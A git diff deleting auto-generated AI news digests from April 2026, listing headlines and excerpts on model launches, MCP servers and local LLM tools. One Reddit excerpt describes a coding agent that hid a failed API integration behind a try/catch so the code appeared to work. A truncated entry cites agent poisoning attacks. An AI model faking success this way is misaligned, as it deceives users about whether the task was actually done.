Slack, with 30 new features](https://techcrunch.com/2026/03/31/salesforce-announces-an-ai-heavy-makeover-for-slack-with-30-new-features/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [How I contributed a new model to the Transformers library using Codex 1 day ago • 34](https://huggingface.co/blog/nielsr/contributing-to-transformers-with-codex) -*Hugging Face Blog* | Score: 1.00 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-04-02.md 
b/data/digest-2026-04-02.md deleted file mode 100644 index d9d990c..0000000 --- a/data/digest-2026-04-02.md +++ /dev/null @@ -1,71 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-02** | 11 stories | Auto-generated from 120 archived stories - ---- - -## [Google releases Gemma 4 under Apache 2.0 — and that license change may matter more than benchmarks](https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter) -*VentureBeat AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex](https://www.wired.com/story/cusor-launches-coding-agent-openai-anthropic/) -*Wired AI* | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [Google announces Gemma 4 open AI models, switches to Apache 2.0 license](https://arstechnica.com/ai/2026/04/google-announces-gemma-4-open-ai-models-switches-to-apache-2-0-license/) -*Ars Technica AI* | Score: 0.98 -Tags: product_launch, open_source - ---- - -## [Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere](https://www.marktechpost.com/2026/04/01/z-ai-launches-glm-5v-turbo-a-native-multimodal-vision-coding-model-optimized-for-openclaw-and-high-capacity-agentic-engineering-workflows-everywhere/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch - ---- - -## [IBM Announces Strategic Collaboration with Arm](https://newsroom.ibm.com/2026-04-02-ibm-announces-strategic-collaboration-with-arm-to-shape-the-future-of-enterprise-computing) -*Hacker News* | 02/04/2026 | Score: 0.98 -Tags: product_launch - ---- - -## [IBM Releases Granite 4.0 3B Vision: A New Vision Language Model for Enterprise Grade Document Data Extraction](https://www.marktechpost.com/2026/04/01/ibm-releases-granite-4-0-3b-vision-a-new-vision-language-model-for-enterprise-grade-document-data-extraction/) -*MarkTechPost* | Score: 0.90 -Tags: 
product_launch - ---- - -## [Google releases Gemma 4 open models](https://deepmind.google/models/gemma/gemma-4/) -*Hacker News* | 02/04/2026 | Score: 0.90 -Tags: product_launch - ---- - -## [Lemonade by AMD: a fast and open source local LLM server using GPU and NPU](https://lemonade-server.ai) -*Hacker News* | 02/04/2026 | Score: 0.82 -Tags: open_source - ---- - -## [Artemis II, NASA's boldest mission in generations, launches crew to the Moon](https://arstechnica.com/space/2026/04/four-astronauts-depart-for-the-moon-with-a-fiery-send-off-from-cape-canaveral/) -*Ars Technica AI* | Score: 0.66 -Tags: product_launch - ---- - -## [Delve allegedly forked an open-source tool and sold it as its own](https://techcrunch.com/2026/04/01/the-reputation-of-troubled-yc-startup-delve-has-gotten-even-worse/) -*Hacker News* | 02/04/2026 | Score: 0.66 -Tags: open_source - ---- - -## [Python API usage](https://github.com/datasette/datasette-llm/blob/0.1a6/README.md#usage) -*Simon Willison's Blog* | Score: 0.66 -Tags: api_update - ---- - diff --git a/data/digest-2026-04-03.md b/data/digest-2026-04-03.md deleted file mode 100644 index 702b24b..0000000 --- a/data/digest-2026-04-03.md +++ /dev/null @@ -1,47 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-03** | 7 stories | Auto-generated from 351 archived stories - ---- - -## [Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use](https://www.marktechpost.com/2026/04/02/arcee-ai-releases-trinity-large-thinking-an-apache-2-0-open-reasoning-model-for-long-horizon-agents-and-tool-use/) -*MarkTechPost* | Score: 1.00 -Tags: api_update, product_launch, open_source - ---- - -## [TII Releases Falcon Perception: A 0.6B-Parameter Early-Fusion Transformer for Open-Vocabulary Grounding and Segmentation from Natural Language 
Prompts](https://www.marktechpost.com/2026/04/03/tii-releases-falcon-perception-a-0-6b-parameter-early-fusion-transformer-for-open-vocabulary-grounding-and-segmentation-from-natural-language-prompts/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch - ---- - -## [New ways to balance cost and reliability in the Gemini API](https://blog.google/innovation-and-ai/technology/developers-tools/introducing-flex-and-priority-inference/) -*Google AI Blog* | Score: 0.94 -Tags: api_update - ---- - -## [C89cc.sh – standalone C89/ELF64 compiler in pure portable shell](https://gist.github.com/alganet/2b89c4368f8d23d033961d8a3deb5c19) -*Hacker News* | 01/04/2026 | Score: 0.74 -Tags: cli_tool - ---- - -## [Your Agent Has 12 Blind Spots You Can't See Yet. This Audit Prompt Finds Them. (+ Skill Package)](https://natesnewsletter.substack.com/p/your-agent-has-12-blind-spots-you) -*Nate's Newsletter* | Score: 0.68 -Tags: developer_tool - ---- - -## [Google Vids extension](https://chromewebstore.google.com/detail/google-vids-screen-record/iklnnbgdcppplombffihcijanngoeifm) -*The Verge AI* | Score: 0.68 -Tags: developer_tool - ---- - -## [Post Mortem: axios NPM supply chain compromise](https://github.com/axios/axios/issues/10636) -*Simon Willison's Blog* | 03/04/2026 | Score: 0.68 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-04-04.md b/data/digest-2026-04-04.md deleted file mode 100644 index c893c6e..0000000 --- a/data/digest-2026-04-04.md +++ /dev/null @@ -1,39 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-04** | 5 stories | Auto-generated from 236 archived stories - ---- - -## [@CloudflareDev — Gemma 4 Just Landed on Cloudflare Workers AI — 256K Context, Tool Calling, Vision](https://x.com/CloudflareDev/status/2040459229039940068) -*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> @CloudflareDev announces Gemma 4 is now on Workers AI — MoE model with 26B total and 4B active parameters, 256K context window, tool calling, reasoning, 
and vision capabilities. - ---- - -## [YC-Bench: Can Your AI Agent Run a Startup Without Going Bankrupt? 2 days ago • 3](https://huggingface.co/blog/collinear-ai/yc-bench) -*Hugging Face Blog* | Score: 1.00 -Tags: agent_tool - ---- - -## [@synthwavedd — GPT Image 2 Stealth Launched — Significant Quality Upgrade for All ChatGPT Users](https://x.com/synthwavedd/status/2040442540508287101) -*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 -Tags: tool_update - -> @synthwavedd reports GPT Image 2 has been stealth launched on ChatGPT — all image generations now routing to the new model. A significant quality upgrade with no announcement. - ---- - -## [Components of A Coding Agent](https://magazine.sebastianraschka.com/p/components-of-a-coding-agent) -*Sebastian Raschka* | Score: 0.86 -Tags: agent_tool - ---- - -## [RAG-Anything: All-in-One RAG Framework](https://paperswithcode.com/papers/2510.12323) -*Papers With Code* | Score: 0.76 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-04-05.md b/data/digest-2026-04-05.md deleted file mode 100644 index 412e7d2..0000000 --- a/data/digest-2026-04-05.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-05** | 15 stories | Auto-generated from 210 archived stories - ---- - -## [Improved markdown quality, code intelligence for 248 languages, and more in Kreuzberg v4.7.0](https://reddit.com/r/LocalLLaMA/comments/1scv46p/improved_markdown_quality_code_intelligence_for/) -*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 -Tags: product_launch, developer_tool, cli_tool, tool_update - -> Kreuzberg v4.7.0 is here. Kreuzberg is a Rust-core document intelligence library that works with Python, TypeScript/Node.js, Go, Ruby, Java, C#, PHP, Elixir, R, C, and WASM. We’ve added several features, integrated OpenWEBUI, and made a big improvement in quality across all formats. There is also a new markdown rendering layer and new HTML output, which we now support. 
And much more (which you can find in our [the release notes](https://github.com/kreuzberg-dev/kreuzberg/releases)). The main - ---- - -## [[P] Cadenza: Connect Wandb logs to agents easily for autonomous research.](https://reddit.com/r/MachineLearning/comments/1scm9do/p_cadenza_connect_wandb_logs_to_agents_easily_for/) -*Reddit r/MachineLearning* | 04/04/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool - -> Wandb CLI and MCP is atrocious to use with agents for full autonomous research loops. They are slow, clunky, and result in context rot. So I built a CLI tool and a Python SDK to make it easy to connect your Wandb projects and runs to your agent (clawed or otherwise). The cli tool works by allowing you to import your wandb projects and structures your runs in a way that makes it easy for agents to get a sense of the solution space of your research project. When projects are imported, only t - ---- - -## [I built an open-source tool that lets Claude Code and Claude Desktop control Unreal Engine — 60+ operations, zero editor clicks](https://reddit.com/r/ClaudeAI/comments/1scvnt8/i_built_an_opensource_tool_that_lets_claude_code/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.94 -Tags: mcp, open_source, developer_tool, cli_tool - -> I wanted Claude to actually *do things* inside Unreal Engine, not just write code and hope it compiles. So I built soft-ue-cli. It's a Python tool + a C++ plugin that runs inside UE. Claude sends commands, UE executes them. Two ways to use it: * **Claude Code** — runs `soft-ue-cli` commands in the terminal * **Claude Desktop / Cursor / Windsurf** — connects via MCP (`soft-ue-cli mcp-serve`) Here's what a typical session looks like. 
I ask Claude to "inspect the player Blueprint and add a healt - ---- - -## [Running OpenClaw with Gemma 4 TurboQuant on MacAir 16GB](https://reddit.com/r/LocalLLaMA/comments/1sciyfg/running_openclaw_with_gemma_4_turboquant_on/) -*Reddit r/LocalLLaMA* | 04/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> Hi guys, We’ve implemented a one-click app for OpenClaw with Local Models built in. It includes TurboQuant caching, a large context window, and proper tool calling. It runs on mid-range devices. Free and Open source. The biggest challenge was enabling a local agentic model to run on average hardware like a Mac Mini or MacBook Air. Small models work well on these devices, but agents require more sophisticated models like QWEN or GLM. OpenClaw adds a large context to each request, which caused t - ---- - -## [Claude Code via VSCode extension still uses more tokens than Claude Code via terminal](https://reddit.com/r/ClaudeAI/comments/1scsl84/claude_code_via_vscode_extension_still_uses_more/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.86 -Tags: developer_tool, cli_tool - -> Last night was the first time I maxed out my max plan session limits simply by trying out Claude Code directly in VSCode. Even on low effort, it seems to chew through tokens while essentially being the same as Claude Code via terminal. Other people seem to have had the same experience: https://www.reddit.com/r/ClaudeAI/comments/1o1ccfz/claude_code_via_extension_consumes_more_tokens/ https://github.com/anthropics/claude-code/issues/19908 Due to this it makes no sense to use it as you're essent - ---- - -## [What are your favorite MCP servers to use with Claude Code?](https://reddit.com/r/ClaudeAI/comments/1scw3ll/what_are_your_favorite_mcp_servers_to_use_with/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.86 -Tags: api_update, mcp - -> I’ve been using one that strips raw HTML before it hits the context window, saves a ton of tokens on web fetches. 
Curious what else people are running and whether it’s actually worth it. - ---- - -## [I built & publicly host a handful of MCP servers - free to use, no API keys/auth needed](https://reddit.com/r/ClaudeAI/comments/1sceak4/i_built_publicly_host_a_handful_of_mcp_servers/) -*Reddit r/ClaudeAI* | 04/04/2026 | Score: 0.86 -Tags: api_update, mcp - -> Hi there, I wanted to share something I've been working on. I've built a collection of MCP servers that are all hosted and publicly available. You can point any MCP client (like Claude/ChatGPT) at them and start using them immediately - no setup/install, no keys/auth, nothing running locally. Here's what's live right now: **Health and science:** * [https://cdc.caseyjhand.com/mcp](https://cdc.caseyjhand.com/mcp) \- 1,487+ CDC public health datasets covering disease surveillance, mortality, vac - ---- - -## [Basic PSA. PocketPal got updated, so runs Gemma 4.](https://reddit.com/r/LocalLLaMA/comments/1scsgid/basic_psa_pocketpal_got_updated_so_runs_gemma_4/) -*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 -Tags: tool_update - -> Just because I've seen a couple of "I want this on Android" questions, PocketPal got updated a few hours ago, and runs Gemma 4 2B and 4B fine. At least on my hardware (crappy little moto g84 workhorse phone). Love an app that gets regular updates. I'm going to try and squeak 26B a4 iq2 quantization into 12gigs of ram, on a fresh boot, but I'm almost certain it can't be done due to Android bloat. But yeah, 2B and 4B work fine and quickly under PocketPal. 
Hopefully their next one is 7-8B (not 9B - ---- - -## [Local Claude Code with Qwen3.5 27B](https://reddit.com/r/LocalLLaMA/comments/1scrnzm/local_claude_code_with_qwen35_27b/) -*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 -Tags: cli_tool - -> after long research, finding best alternative for [Using a local LLM in OpenCode with llama.cpp](https://aayushgarg.dev/posts/2026-03-29-local-llm-opencode/) to use totally local environment for coding tasks I found this article [How to connect Claude Code CLI to a local llama.cpp server](https://www.reddit.com/r/LocalLLaMA/comments/1s8l1ef/how_to_connect_claude_code_cli_to_a_local/) how to disable telemetry and make claude code totally offline. model used - Qwen3.5 27B Quant used - u - ---- - -## [Gemma 4 vs Qwen3.5 on SVG style](https://reddit.com/r/LocalLLaMA/comments/1scr78z/gemma_4_vs_qwen35_on_svg_style/) -*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 -Tags: api_update - -> Some quick test using Gemma4-31B and Qwen3.5-27B, both Q4 quants from unsloth. I was already expecting Gemma 4 to be excellent at creative writing and better at translations for more obscure languages, but I didn’t expected to be that good at function calling and general coding tasks, and even in creating SVGs! Did you find any areas when Qwen3.5 beats Gemma4 ? - ---- - -## [[P] MCGrad: fix calibration of your ML model in subgroups](https://reddit.com/r/MachineLearning/comments/1scjzer/p_mcgrad_fix_calibration_of_your_ml_model_in/) -*Reddit r/MachineLearning* | 04/04/2026 | Score: 1.00 -Tags: developer_tool - -> Hi r/MachineLearning, We’re open-sourcing **MCGrad**, a Python package for multicalibration–developed and deployed in production at Meta. This work will also be presented at KDD 2026. **The Problem:** A model can be globally calibrated yet significantly miscalibrated within identifiable subgroups or feature intersections (e.g., "users in region X on mobile devices"). 
Multicalibration aims to ensure reliability across such subpopulations. **The Solution:** MCGrad reformulates multicalibration - ---- - -## [Matthew Berman Built 'Journey' — Agents Can Now Discover and Install Workflows Easily](https://x.com/DoctorYev/status/2040484581581951473) -*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 -Tags: tool_update - -> Matthew Berman launched Journey, a tool for agents to discover and install full workflows. Braygent would post about why workflow discovery is the missing piece of the agent ecosystem. - ---- - -## [Clement Delangue Is Telling Everyone to Move to Open and Local Models](https://x.com/peteskomoroch/status/2040516928461303930) -*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 -Tags: open_source - -> HuggingFace CEO Clement Delangue publicly urged developers to move to open or local models. Braygent would post about why this moment feels different from previous open source advocacy. - ---- - -## [Voting for our open source AI art competition is open for the next 45 hours](https://reddit.com/r/StableDiffusion/comments/1scj9bn/voting_for_our_open_source_ai_art_competition_is/) -*Reddit r/StableDiffusion* | 04/04/2026 | Score: 1.00 -Tags: open_source - -> If you would like to be inspired about what open models can do - both technically and artistically - it's probably not a bad way to spend a few hours. Like [here](https://arcagidan.com/). Most of the entries also shared the workflows they used! - ---- - -## [We absolutely need Qwen3.6-397B-A17B to be open source](https://reddit.com/r/LocalLLaMA/comments/1sccpbj/we_absolutely_need_qwen36397ba17b_to_be_open/) -*Reddit r/LocalLLaMA* | 04/04/2026 | Score: 1.00 -Tags: open_source - -> The benchmarks may not show it but it's a substantial improvement over 3.5 for real world tasks. This model is performing better than GLM-5.1 and Kimi-k2.5 for me, and the biggest area of improvement has been reliability. 
It feels as reliable as claude in getting shit done end to end and not mess up half way and waste hours. This is the first OS model that has actually felt like I can compare it to Claude Sonnet. We have been comparing OS models with claude sonnet and opus left and right mont - ---- - diff --git a/data/digest-2026-04-06.md b/data/digest-2026-04-06.md deleted file mode 100644 index 23d6f97..0000000 --- a/data/digest-2026-04-06.md +++ /dev/null @@ -1,119 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-06** | 15 stories | Auto-generated from 651 archived stories - ---- - -## [RightNow AI Releases AutoKernel: An Open-Source Framework that Applies an Autonomous Agent Loop to GPU Kernel Optimization for Arbitrary PyTorch Models](https://www.marktechpost.com/2026/04/06/rightnow-ai-releases-autokernel-an-open-source-framework-that-applies-an-autonomous-agent-loop-to-gpu-kernel-optimization-for-arbitrary-pytorch-models/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch, open_source, developer_tool - ---- - -## [[P] Easily provide Wandb logs as context to agents for analysis and planning.](https://reddit.com/r/MachineLearning/comments/1se1rmd/p_easily_provide_wandb_logs_as_context_to_agents/) -*Reddit r/MachineLearning* | 06/04/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> It is frustrating to use the Wandb CLI and MCP tools with my agents. 
For one, the MCP tool basically floods the context window and frequently errors out :/ So I built a cli tool that: * imports my wandb projects; * uses algorithms from [AlphaEvolve](https://arxiv.org/abs/2506.13131) to index and structure my runs; * is easy to use for agents; * provides greater context of past experiments; * does not flood the context window; and * easily tune exploration-exploitation while planning Would lov - ---- - -## [Gemma4:26b's reasoning capabilities are crazy.](https://reddit.com/r/LocalLLaMA/comments/1sdz71b/gemma426bs_reasoning_capabilities_are_crazy/) -*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through Gemini-3-Flash because no other model I've tried has been able to match it's reasoning ability. The script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several rasperry pi zeroes functioning as speaker satellites for a central - ---- - -## [[D] Why do we keep pretending that AI agent continuity is a prompt engineering problem?](https://reddit.com/r/MachineLearning/comments/1sdwqn5/d_why_do_we_keep_pretending_that_ai_agent/) -*Reddit r/MachineLearning* | 06/04/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Every few months someone posts about "long-term memory for LLMs" and the thread fills with retrieval strategies, vector databases, and context window tricks. Good engineering. Wrong level of abstraction. The continuity problem for deployed AI agents is not a retrieval problem. It is an infrastructure problem. Here is the distinction: **Retrieval-level continuity:** The agent can surface relevant context from past interactions. 
This is solved well enough with embedding search, hierarchical sum - ---- - -## [Claude Code can now submit your app to App Store Connect and help you pass review](https://reddit.com/r/ClaudeAI/comments/1sdot1s/claude_code_can_now_submit_your_app_to_app_store/) -*Reddit r/ClaudeAI* | 06/04/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> I built a native macOS app called Blitz that gives Claude Code (or any MCP client) full control over App Store Connect. Built most of it with Claude Code. The problem was simple: every time I needed to submit to ASC, the entire agentic workflow broke. Metadata, screenshots, builds, localization, review notes... all meant leaving the terminal and fighting Apple's web UI. So I built MCP servers that let Claude Code handle the whole thing. What Claude Code can do through Blitz: * Create and edit - ---- - -## [Apex Protocol – An open MCP-based standard for AI agent trading](https://apexstandard.org/) -*Hacker News* | 06/04/2026 | Score: 1.00 -Tags: mcp, agent_tool - ---- - -## [I built CLI-Anything-WEB — a Claude Code plugin that generates complete Python CLIs for any website (17 CLIs so far: Amazon, Airbnb, TripAdvisor, Reddit, YouTube...)](https://reddit.com/r/ClaudeAI/comments/1sde44i/i_built_clianythingweb_a_claude_code_plugin_that/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.94 -Tags: developer_tool, cli_tool - -> Point it at a URL, Claude Code captures the live HTTP traffic, and generates a production-grade Python CLI with commands, tests, REPL mode, and `--json` output — fully automated across 4 phases. ## How it works - **Phase 1 (capture)**: Records live browser traffic via playwright-cli - **Phase 2 (methodology)**: Analyzes endpoints, designs architecture, generates CLI code - **Phase 3 (testing)**: Writes unit + E2E tests (40–60+ per CLI, all passing) - **Phase 4 (standards)**: 3 parallel Claude - ---- - -## [I spent 3 months evolving SmartGallery into a free professional Local First DAM. 
v2.11 launches on April 9th](https://reddit.com/r/StableDiffusion/comments/1se8sfd/i_spent_3_months_evolving_smartgallery_into_a/) -*Reddit r/StableDiffusion* | 06/04/2026 | Score: 0.86 -Tags: product_launch, tool_update - -> https://preview.redd.it/btvzkruzemtg1.png?width=1899&format=png&auto=webp&s=3891b8f2a7df98942a0643eb649e623f817211ae **Hi everyone!** Many of you know SmartGallery as a standalone gallery for ComfyUI. For the last 3 months, I have been working to turn it into a complete Digital Asset Manager (DAM) for AI creators. * I just launched the new website with the full documentation and feature list of the upcoming v2.11: [**https://smartgallerydam.com**](https://smartgallerydam.com) * ** - ---- - -## [Mercury – Free MCP proxy that cuts non-English token costs by 28-64%](https://reddit.com/r/ClaudeAI/comments/1sduozd/mercury_free_mcp_proxy_that_cuts_nonenglish_token/) -*Reddit r/ClaudeAI* | 06/04/2026 | Score: 0.86 -Tags: api_update, mcp - -> I noticed that when using Claude with Japanese MCP servers, I was burning through tokens surprisingly fast. The culprit: LLMs use English-centric BPE tokenizers, so non-English text consumes 2-4x more tokens per word than equivalent English. The fix seemed obvious — translate MCP responses to English before they reach the LLM. So I built Mercury, a transparent proxy that sits between any MCP server and your LLM client. 
It uses Google Translate (free, no API key needed) by default, so transl - ---- - -## [Meet ‘AutoAgent’: The Open-Source Library That Lets an AI Engineer and Optimize Its Own Agent Harness Overnight](https://www.marktechpost.com/2026/04/05/meet-autoagent-the-open-source-library-that-lets-an-ai-engineer-and-optimize-its-own-agent-harness-overnight/) -*MarkTechPost* | Score: 0.82 -Tags: open_source, developer_tool - ---- - -## [I built a macOS widget to track Claude usage limits in real-time](https://reddit.com/r/ClaudeAI/comments/1sd923u/i_built_a_macos_widget_to_track_claude_usage/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.62 -Tags: api_update, open_source - -> Hey everyone! I built a free, open-source macOS desktop widget that shows your Claude usage limits at a glance — no more guessing when your rate limit resets. What it does: * Displays both the 5-hour session and 7-day weekly usage windows with progress bars * Shows countdown timers for when each window resets * Color-coded indicators — green → yellow → orange → red as you approach the limit * Auto-refreshes every 5 minutes * Comes in small, medium, and large widget sizes Quick demo: It sits rig - ---- - -## [After months with Claude Code, the biggest time sink isn't bugs — it's silent fake success](https://reddit.com/r/ClaudeAI/comments/1sdmohb/after_months_with_claude_code_the_biggest_time/) -*Reddit r/ClaudeAI* | 06/04/2026 | Score: 0.54 -Tags: api_update, tool_update - -> I've been using Claude Code daily for months and there's a pattern that has cost me more debugging time than actual bugs: the agent making things *look* like they work when they don't. Here's what happens. You ask it to build something that fetches data from an API. It writes the code, you run it, data appears on screen. Looks correct. You move on. Three days later you discover the API integration was broken from the start. 
The agent couldn't get auth working, so it quietly inserted a try/catc - ---- - -## [[llama.cpp] 3.1x Q8_0 speedup on Intel Arc GPUs - reorder optimization fix (PR submitted)](https://reddit.com/r/LocalLLaMA/comments/1se9d9x/llamacpp_31x_q8_0_speedup_on_intel_arc_gpus/) -*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 -Tags: agent_tool - -> ***TL;DR***: Q8\_0 quantization on Intel Xe2 (Battlemage/Arc B-series) GPUs was achieving only 21% of theoretical memory bandwidth. My AI Agent and I found the root cause and submitted a fix that brings it to 66% - a 3.1x speedup in token generation. **The problem**: On Intel Arc Pro B70, Q8\_0 models ran at 4.88 t/s while Q4\_K\_M ran at 20.56 t/s; a 4x gap that shouldn't exist since Q8\_0 only has 1.7x more data. After ruling out VRAM pressure, drivers, and backend issues, we traced it to th - ---- - -## [llama.cpp - llama-bench: add `-fitc` and `-fitt` to arguments](https://reddit.com/r/LocalLLaMA/comments/1se8ezw/llamacpp_llamabench_add_fitc_and_fitt_to_arguments/) -*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 -Tags: product_launch - -> Was expecting this for sometime. This is available [b8679](https://github.com/ggml-org/llama.cpp/releases/tag/b8679) onwards. - ---- - -## [I benchmarked 37 LLMs on MacBook Air M5 32GB — full results + open-source tool to benchmark your own Mac](https://reddit.com/r/LocalLLaMA/comments/1se81a5/i_benchmarked_37_llms_on_macbook_air_m5_32gb_full/) -*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 -Tags: open_source - -> So I got curious about how fast different models actually run on my M5 Air (32GB, 10 CPU/10 GPU). Instead of just testing one or two, I went through 37 models across 10 different families and recorded everything using llama-bench with Q4\_K\_M quantization. The goal: build a **community benchmark database** covering every Apple Silicon chip (M1 through M5, base/Pro/Max/Ultra) so anyone can look up performance for their exact hardware. 
# The Results (M5 32GB, Q4_K_M, llama-bench) # Top 15 by G - ---- - diff --git a/data/digest-2026-04-07.md b/data/digest-2026-04-07.md deleted file mode 100644 index 26d7e73..0000000 --- a/data/digest-2026-04-07.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-07** | 15 stories | Auto-generated from 570 archived stories - ---- - -## [I wanted Claude Max but I'm a broke CS student. So I built an open-source TUI orchestrator that forces free/local models to act as a swarm using AST-Hypergraphs and Git worktrees. I would appreciate suggestions, advice, and feedback that can help me improve the tool before I release it!](https://reddit.com/r/ClaudeAI/comments/1seg9i0/i_wanted_claude_max_but_im_a_broke_cs_student_so/) -*Reddit r/ClaudeAI* | 07/04/2026 | Score: 1.00 -Tags: api_update, open_source, cli_tool - -> Hey everyone, I'm a Computer Science undergrad, and lately, I've been obsessed with the idea of autonomous coding agents. The problem? I simply cannot afford the costs of running massive context windows for multi-step reasoning. I wanted to build a CLI tool that could utilize local models, API endpoints or/and the coolest part, it can utilize tools like **Codex**, **Antigravity**, **Cursor**, VS Code's **Copilot** (All of these tools have free tiers and student plans), and **Claude Code** to - ---- - -## [[D] MemPalace claims 100% on LoCoMo and a "perfect score on LongMemEval." Its own BENCHMARKS.md documents why neither is meaningful.](https://reddit.com/r/MachineLearning/comments/1seunbr/d_mempalace_claims_100_on_locomo_and_a_perfect/) -*Reddit r/MachineLearning* | 07/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> A new open-source memory project called MemPalace launched yesterday claiming "100% on LoCoMo" and "the first perfect score ever recorded on LongMemEval. 500/500 questions, every category at 100%." 
The launch tweet went viral reaching over 1.5 million views while the repository picked up over 7,000 GitHub stars in less than 24 hours. The interesting thing is not that the headline numbers are inflated. The interesting thing is that the project's own BENCHMARKS.md file documents this in detail, w - ---- - -## [Built an open source memory layer for local AI agents, runs fully offline, no cloud needed](https://reddit.com/r/LocalLLaMA/comments/1serbdw/built_an_open_source_memory_layer_for_local_ai/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> I built an open source memory layer for AI agents called Octopoda. Runs entirely locally, no cloud, no API keys, no external services. Everything stays on your machine. The problem is pretty simple. Agents forget everything between sessions. Every time you restart your agent it starts from scratch like you never talked to it. I kept building hacky workarounds for this so eventually I just built a proper solution. It gives your agents persistent memory that survives restarts and crashes, semant - ---- - -## [Mistral Introduces "Voxtral TTS": An Open-Weight Text-to-Voice Model Capable Of Cloning Any Voice From 3 Seconds Of Audio, Runs In 9 Languages, & Beats Elevenlabs Flash V2.5 With A 68.4% Human Preference Win Rate.](https://reddit.com/r/LocalLLaMA/comments/1selwtz/mistral_introduces_voxtral_tts_an_openweight/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> ElevenLabs built a moat on proprietary weights and API lock-in. Mistral just put the weights on Hugging Face. The model captures not just the voice but the person. Accents, inflections, intonations, vocal fillers the "ums" and "ahs" that make a voice sound human instead of synthetic. From 3 seconds of reference audio. Zero fine-tuning. Zero shot. 
--- ####Key Highlights: - → 68.4% win rate against ElevenLabs Flash v2.5 in zero-shot multilingual voice cloning - → Beats ElevenLabs Flash v2.5 - ---- - -## [OpenCode Is Working Towards Version 2.0 — 46 Likes for the Developer Update](https://x.com/thdxr/status/2041330695822279077) -*Aligned News (Scoble)* | 07/04/2026 | Score: 1.00 -Tags: cli_tool, tool_update - -> Braygent's take on OpenCode working towards 2.0 with Node.js support and updated APIs (46 likes), noting that while Claude Code loses builders, OpenCode keeps shipping improvements. - ---- - -## [Pro Subscription Usage](https://reddit.com/r/ClaudeAI/comments/1sf7fi9/pro_subscription_usage/) -*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.94 -Tags: mcp, open_source - -> Hi there. I've been on the Max 20x plan for many months now - I'd hit the hourly cap sometimes and the weekly cap rarely, each week. I build and host open source "public service" MCP servers with my sub. I haven't been doing well health wise and haven't been able to work - I spent $20 of my last $100 buying a Pro sub because my Max sub ended today and I use Claude to assist me with nearly everything at this point. Before even entering my first prompt, it showed I had already used 11% of - ---- - -## [Second Brain and Haah: human-agent-agent-human network with Claude](https://reddit.com/r/ClaudeAI/comments/1setpma/second_brain_and_haah_humanagentagenthuman/) -*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.78 -Tags: open_source, tool_update - -> I built something I genuinely enjoy with Claude. I was working on an app for a year and over last three weeks I completely replaced it with skills for Claude Code. Built frontend, backend, and matching mechanism with Claude. Disrupted myself. Launched six open source skills including Haah: human-agent-agent-human to network for your second brain. The idea is to build up a few domains: People, Places, Books, Music, and link them together in a meaningful way. 
But then would not be cool that if I - ---- - -## [stop buying courses to learn new tools. a $20 claude sub and one prompt is all you need.](https://reddit.com/r/ClaudeAI/comments/1setmup/stop_buying_courses_to_learn_new_tools_a_20/) -*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.70 -Tags: developer_tool, tool_update - -> **tl;dr** — feed a tool's docs into claude's context and use one prompt to turn it into a mentor that teaches by giving you tasks. not by lecturing. i've been doing this since claude launched Projects in mid-2024. haven't bought a tech course since. whenever i need to pick up a new tool or framework, i skip the 3-hour youtube tutorials. instead, i grab the official docs (markdown from github), dump them into a claude chat, and send this: `You are my senior mentor. I have provided documentation - ---- - -## [[D] Your Agent, Their Asset: Real-world safety evaluation of OpenClaw agents (CIK poisoning raises attack success to ~64–74%)](https://reddit.com/r/MachineLearning/comments/1sfbo0n/d_your_agent_their_asset_realworld_safety/) -*Reddit 